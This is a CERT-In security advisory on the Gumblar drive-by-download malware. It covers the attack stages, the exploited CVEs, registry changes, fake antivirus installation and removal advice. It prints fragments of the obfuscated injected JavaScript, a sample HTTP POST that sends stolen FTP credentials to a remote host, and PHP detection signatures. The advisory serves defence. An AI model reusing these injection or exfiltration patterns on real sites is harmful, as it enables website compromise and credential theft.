Gumblar malware exploit
Original issue date:
June
02, 2009
Updated: October 30, 2009; January 11, 2010
It has been reported that a malicious domain Gumblar dot cn (down now) that was hosting the malware exploit , has been actively used for compromising thousands websites already. This is a drive by download with multiple stages. The first stage of exploit is to attempt to inject malicious code onto the vulnerable website primarily through stolen FTP credentials, poor configuration settings, vulnerable web application etc. Subsequently a domain Marutz dot cn was reported hosting malicious exploit.
Infected web pages (may) contain a script that looks like this (Every infected site has its own modification of the script)
When the script is executed (every time someone visits the infected web page), another script from “ gumblar . cn/rss/ ” is silently loaded and executed. This code is usually injected right before the <body> tag.
The second stage of this exploit occurs when a user visit a website compromised by Gumblar. The exploit tries to infect the user system by exploiting known PDF and flash player vulnerabilities.
It is also reported that unlike hosting the whole malicious exploits in a single malicious domain(gumblar .cn),thousands of legitimate sites are compromised and directly hosting malicious scripts and payload thus making it more decentralized and redundant. Attack vector as show in the figure below;
The attack vectors are reported to be recently reported adobe acrobat and reader vulnerability ( CVE-2009-3459 ) adobe flash player vulnerability ( CVE-2007-0071 )
and Microsoft Office web component vulnerability described in MS09-043
The path/filename of the malicious .php file on the compromised site is identical to an already existing path/filename of a legitimate and already existing file (usually .gif or some other image type).
The impact of the infection is that the victim computer is being not able to boot.
Websites are being injected with new type of obfuscsted javascript strings like below:
- <script>/*GNU GPL*/ try{window.onload = function(){var ~
- <script>/*CODE1*/ try{window.onload = function(){var ~
- <script>/*LGPL*/ try{ window.onload = function(){var C1nse3sk8o41s =document.createElement('s&c^$#r))
i($p@&t^&'.repl
Once de-obfuscated , these URLs leads to well-known domain names joomla-org, spankwire.com , w3schools-com, google.com,bing.com,
google.fr,wordpress.org.
The malicious scripts further downloads javascripts which opens two links, one to a PDF file and the other is a JAR file. Once infected the files try to infect the system with the following vulnerabilities.
Adobe Acrobat and Reader Multiple Arbitrary Code Execution and Security ( CVE-2008-2042 )
Adobe Reader and Acrobat 'newplayer()' JavaScript Method Remote Code Execution Vulnerability ( CIVN-2009-154 )
Sun Java Runtime Environment and Java Development Kit Multiple Security Vulnerabilities ( CIAD-2008-64 )
Once successfully exploited, users are infected with malware like Bredolab , Zbot variants and misleading rouge applications.
Aliases:
JSRedir-R(Sophos),
Trojan.Malscript.B (Symantec) , Trojan:JS/Redirector
When infects a system Gumblar Exploit :
- Adds the following registry entries
- HKLM\SYSTEM\ControlSet001\Services\VSSMSDTC\
ImagePath: “C:\WINDOWS\system32\asferrort.exe srv”
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\
Run\PromoReg:“C:\WINDOWS\Temp\wpv701242765100
.exe”
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
pp: “c:\windows\variable name .exe”
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
12281714: “C:\Documents and Settings\All Users\
Application Data\12281714\12281714.exe”
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
92291706: “C:\Documents and Settings\All Users\Application Data\92291706\92291706.exe”
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\
Run\sysldtray: “c:\windows\ld08.exe”
- HKLM\SOFTWARE\WinPcap
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\
Uninstall\SystemSecurity2009
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\
Internet Settings\ProxyServer: “http=localhost:7171″
- HKLM\SYSTEM\ControlSet001\Services\SharedAccess\
Parameters\FirewallPolicy\StandardProfile\Globally
OpenPorts\List\80:TCP: “80:TCP:*:Enabled:SYS32DLL”
- HKLM\SYSTEM\ControlSet001\Services\SharedAccess\
Parameters\FirewallPolicy\StandardProfile\GloballyOpen
Ports\List\7171:TCP: “7171:TCP:*:Enabled:SYS32DLL”
- HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
Image File Execution Options\zonealarm.exe\Debugger:
“ntsd -d”
- HKLM\SOFTWARE\Classes\CLSID\{31F57AFD-3989-4A5B-A33E-6B6253DF8DD4}\InprocServer32\:“C:\WINDOWS\
system32\
547372\547372.dll”
- Infects a windows file “ sqlsodbc.chm”(C:\WINDOWS\System32).
- Files below ~200 kb whose extension does not match with the following are injected with malicious PHP scripts
( zip .rar, .gz, .jpg, .gif, .avi, .mp3, .wma, .mpg, .png, .txt, .swf, .css .js,.log, .pdf, .ppt,.fla, .as, .tar)
- Steals FTP credentials
The malware configures the network card in
promiscuous mode (to capture other FTP credentials
from machines on the same subnet ) and collect the
FTP credentials and sent to remote host in an encoded format.
Sample traffic is given below:
POST /good/receiver/ftp HTTP/1.1
Host: 78.109.XX.XXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
ftp_uri_0=9ObqyMjmQWwGxvOwcOfhoJ%2BClWBtBM2kvn
D%2F0qzByfsUN0eauuUxo6GiyNX4&ftp_source_0=xuD7lI
GgQwAn entry is made in the registry for winpcap
- Installs fake anti virus
A fake anti-virus software “System Security 2009” being installed on the system
Screenshots are given below:
Countermeasures :
- site administrators are advised to Check htaccess, php_includes, and other configuration settings, as well as ensuring directory permissions are set appropriately.
- Search and remove the below mentioned malicious code injected into the server files (.html, .php, .js etc)
- script language=javascript><!–*\n*\n*<body>
- <?php f(!function_exists(’tmp_lkojfghx’)*tmp_lkojfghx
2(); ?>
- <?php eval(base64_decode(*c7′)); ?>
- <!–*\n*(function(*.replace(*\n*–>
- Scan system with a Antivirus/Anti-spyware.
- Change the FTP credentials (if any) for the administrators to upload
content into website
- It is recommended to use SFTP(FTP over SSH) instead of plain FTP.
- Delete files and the registry entries made by mentioned above.
- Update Adobe Flash player and PDF to latest versions. (if installed). and updatewith patched regularly.
- Obtain the SHA1 of the installed sqlsodbc.chm and compare it to the
list given here.( If the SHA1 and corresponding file size doesn't match,
it could be indication of a Gumblar infection.)
- Review the security of the web server and website for application and
operating system vulnerabilities and apply appropriate patches/updates
- Block the domains mentioned above at the perimeter level.
- Install and maintain updated anti-virus software at gateway and desktop level
- Install and maintain Desktop Firewall and block the ports which are not required.
References
http://www.sophos.com/security/analyses/viruses-and-
spyware/trojjsredirr.html
http://www.martinsecurity.net/2009/05/20/inside-the-massive
-gumblar-attacka-dentro-del-enorme-ataque-gumblar/
http://www.techknowme.com/blog/2009/05/fighting-the-jsredir-r-
gumblarcn-trojan/comment-page-1/#comment-2
http://blog.scansafe.com/journal/2009/5/14/gumblar-qa.html
http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-
facts-about-this-injected-script/
http://blog.scansafe.com/journal/2009/5/27/gumblar-modified-sqlsodbcchm-clue-to-infection.html
http://www.iss.net/threats/289.html
http://www.iss.net/threats/348.html
http://blogs.iss.net/index.html
http://www.symantec.com/business/security_response/writeup.jsp?
docid=2010-010809-5538-99&tabid=2
http://www.sophos.com/blogs/sophoslabs/?p=8055
http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-
to-obfuscated-scripts/#more-478
http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-2042
http://www.cert-in.org.in/vulnerability/civn-2009-154.htm
http://www.cert-in.org.in/advisory/ciad-2008-64.htm
http://www.symantec.com/business/security_response/writeup.jsp?
docid=2010-010809-5538-99
Disclaimer The information provided herein is on "as is" basis, without warranty of any kind.
Contact Information
Phone: +91-11-24368572
Postal address:
Indian Computer Emergency Response Team (CERT-In)
Ministry of Communications and Information Technology
Electronics Niketan
6, C.G.O. Complex
New Delhi-110 003
|
